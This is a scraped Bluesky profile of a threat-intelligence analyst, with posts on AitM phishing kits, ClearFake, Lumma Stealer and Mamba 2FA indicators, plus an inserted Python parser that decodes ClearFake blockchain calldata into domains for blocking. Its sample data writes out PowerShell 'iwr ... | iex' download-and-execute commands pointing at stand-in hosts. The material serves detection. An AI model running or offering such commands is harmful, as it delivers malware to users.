
gregclermont

@gregclermont.bsky.social

Cybercrime threat intel and detection shenanigans at Sekoia.io

53 Followers  |  34 Following  |  4 Posts  |  Joined: 05.10.2023

Latest posts by gregclermont.bsky.social on Bluesky


πŸ“ Our latest #TDR report delivers an in-depth analysis of Adversary-in-the-Middle (#AitM) #phishing threats - targeting Microsoft 365 and Google accounts - and their ecosystem.

This report shares actionable intelligence to help analysts detect and investigate AitM phishing.

11.06.2025 08:32  |  10 likes, 7 reposts, 1 reply, 0 pins

The future of security operations depends on tools that reflect a deep understanding of investigative work. Unfortunately, many AI-driven products are being built by folks with neither investigative experience nor insight into the cognitive processes underlying effective analysis

05.06.2025 16:01  |  2 likes, 1 repost, 1 reply, 0 pins

CTI tip: monitor transactions from the Ethereum address 0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA to identify new PowerShell commands distributed by ClearFake - and block/detect any traffic to malicious domains!

As usual, feedback is greatly appreciated!

20.03.2025 18:50  |  2 likes, 1 repost, 0 replies, 0 pins
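The tip above relies on the fact that an attacker who stores loader commands on a blockchain cannot take them back: every transaction the tracked address sends is public and stays public, so the calldata is a free, tamper-proof feed of whatever the operators push next. The following is an added example (not code from the post or from Sekoia) of the parsing step that follows the retrieval. It assumes the payload is passed as a single ABI-encoded `string` argument, which is an assumption about the contract interface, not a documented ClearFake detail; the 4-byte selector and the PowerShell commands are constructed for the demonstration, and fetching the real transactions from a node or block explorer API is left out so the block runs offline. It also expands `-EncodedCommand` payloads, since PowerShell takes those as Base64 of UTF-16LE text and the URLs would otherwise be invisible to a plain regex.

```python
import base64
import re
from urllib.parse import urlparse

# Constructed, hypothetical function selector for the sample calldata; the real
# contract ABI is not reproduced here.
SAMPLE_SELECTOR = bytes.fromhex("c0ffee00")

# Regexes: http(s) URLs, and a PowerShell -e / -enc / -EncodedCommand argument
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.I)
ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def abi_encode_string(text: str, selector: bytes) -> str:
    """Build calldata for f(string): selector | offset(32) | length(32) | data padded to 32."""
    data = text.encode("utf-8")
    padded = data + b"\x00" * ((32 - len(data) % 32) % 32)
    body = (32).to_bytes(32, "big") + len(data).to_bytes(32, "big") + padded
    return "0x" + (selector + body).hex()


def abi_decode_string(calldata: str) -> str:
    """Reverse of abi_encode_string: pull the single string argument out of calldata."""
    raw = bytes.fromhex(calldata[2:] if calldata.startswith("0x") else calldata)
    args = raw[4:]  # skip the 4-byte function selector
    if len(args) < 64:
        raise ValueError("calldata too short for an ABI-encoded string")
    offset = int.from_bytes(args[:32], "big")
    length = int.from_bytes(args[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(args):
        raise ValueError("declared string length exceeds calldata")
    # errors="replace" keeps the pipeline alive if the operator ships junk bytes
    return args[start:start + length].decode("utf-8", errors="replace")


def expand_encoded(cmd: str) -> str:
    """Decode a -EncodedCommand argument (Base64 of UTF-16LE) so its contents can be inspected."""
    m = ENC_RE.search(cmd)
    if not m:
        return cmd
    try:
        inner = base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmd
    return cmd[:m.start()] + inner + cmd[m.end():]


def indicators_from_calldata(calldata: str) -> dict:
    """Decode one transaction's calldata and extract the URLs and domains it references."""
    cmd = expand_encoded(abi_decode_string(calldata))
    urls = URL_RE.findall(cmd)
    domains = sorted({urlparse(u).hostname for u in urls if urlparse(u).hostname})
    return {"command": cmd, "urls": urls, "domains": domains}


# Constructed sample transactions (not real ClearFake payloads; .invalid TLD is reserved).
SAMPLE_COMMAND = 'powershell -w hidden -c "iwr http://loader.example.invalid/update.ps1 | iex"'
SAMPLE_CALLDATA = abi_encode_string(SAMPLE_COMMAND, SAMPLE_SELECTOR)

_inner = "iex (iwr 'https://stage2.example.invalid/p.txt')"
SAMPLE_ENCODED_CALLDATA = abi_encode_string(
    "powershell -nop -enc " + base64.b64encode(_inner.encode("utf-16-le")).decode(),
    SAMPLE_SELECTOR,
)

if __name__ == "__main__":
    for cd in (SAMPLE_CALLDATA, SAMPLE_ENCODED_CALLDATA):
        result = indicators_from_calldata(cd)
        print(result["command"])
        print("  block/detect:", ", ".join(result["domains"]))
```

In a real pipeline the transactions would come from a node RPC or explorer API filtered on the sender address from the tip; check the `from` field before trusting a payload, since anyone can send a transaction to the same contract, and feed the resulting domains to your proxy or DNS blocklist.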

Here is our in-depth analysis of the latest #ClearFake variant using the Binance Smart Chain and two new ClickFix lures.

ClearFake is injected into thousands of compromised sites to distribute the #Emmental Loader, #Lumma, #Rhadamanthys, and #Vidar.

⬇️

bsky.app/profile/seko...

20.03.2025 18:50  |  4 likes, 1 repost, 1 reply, 0 pins
Link preview: Ten Machine Requirements To Satisfy Essentials Of Joint Activity

I recently read the paper "Towards Joint Activity Design Heuristics: Essentials for Human-Machine Teaming" which I loved so much I wanted to make it easier to share. To that end, I've excerpted the Ten Heuristics from the paper here: human-machine.team with anchors for each heuristic.

07.03.2025 02:24  |  16 likes, 10 reposts, 0 replies, 0 pins

Thank you, I love these blog posts!
Out of curiosity: do you track EpiBrowser and OneStart as belonging to this BrowserAssistant cluster that you just dropped?

24.02.2025 17:17  |  1 like, 0 reposts, 1 reply, 0 pins

For those who did not monitor the supply chain attack against Chrome extensions in December 2024, our article provides an overview of:

- the targeted phishing attack against extension developers
- malicious code
- the adversary's infrastructure

⬇️

bsky.app/profile/seko...

22.01.2025 14:39  |  3 likes, 3 reposts, 0 replies, 0 pins
Link preview: Targeted supply chain attack against Chrome browser extensions. In this blog post, learn about the supply chain attack targeting Chrome browser extensions and the associated targeted phishing campaign.

New campaign ⬇️

blog.sekoia.io/targeted-sup...

23.01.2025 09:12  |  3 likes, 2 reposts, 0 replies, 0 pins

Around 1,000 malicious domains are hosting webpages impersonating Reddit and WeTransfer, redirecting users to download password-protected archives.

These archives contain an AutoIt dropper, which we internally named #SelfAU3 Dropper at @sekoia.io, and which executes #Lumma Stealer.

IoCs ⬇️

20.01.2025 18:13  |  9 likes, 6 reposts, 2 replies, 0 pins

25gray3cook[.]com #Mamba2FA

17.01.2025 15:07  |  0 likes, 0 reposts, 0 replies, 0 pins

Our last article exposes the new AiTM phishing kit Sneaky 2FA, sold by the cybercrime service "Sneaky Log"!

We provide an in-depth analysis of the phishing pages, the associated service, detection opportunities and multiple IoCs.

⬇️

bsky.app/profile/seko...

16.01.2025 16:44  |  6 likes, 1 repost, 1 reply, 0 pins
Link preview: Double-Tap Campaign: Russia-nexus APT possibly related to APT28 conducts cyber espionage on Central Asia and Kazakhstan diplomatic relations. Uncover the details of the UAC-0063 cyberespionage campaign in Kazakhstan and its potential connection to APT28.

Sekoia investigated a cyber espionage campaign using legitimate Office documents, assessed to originate from the Ministry of Foreign Affairs of Kazakhstan, that were weaponized and used to collect strategic intelligence in Central Asia.
Here is the Double Tap campaign > blog.sekoia.io/double-tap-c...

13.01.2025 09:00  |  1 like, 1 repost, 0 replies, 0 pins

New Mamba 2FA relay domain:
25black1cook[.]com

#Mamba2FA #AiTM #PhaaS #phishing

08.01.2025 14:19  |  0 likes, 0 reposts, 1 reply, 0 pins
Link preview: Anti-bot services used by PhaaS - Part 1. Phishing-as-a-Service (PhaaS) kits will frequently employ one or more techniques to avoid detection by security software. Often they will use a captcha like Cloudflare Turnstile, Google reCAPTCHA, or ...

Great post by rmceoin about #Adspect, the shady anti-bot service used by #Mamba2FA
rmceoin.github.io/malware-anal...

21.12.2024 22:43  |  0 likes, 0 reposts, 0 replies, 0 pins
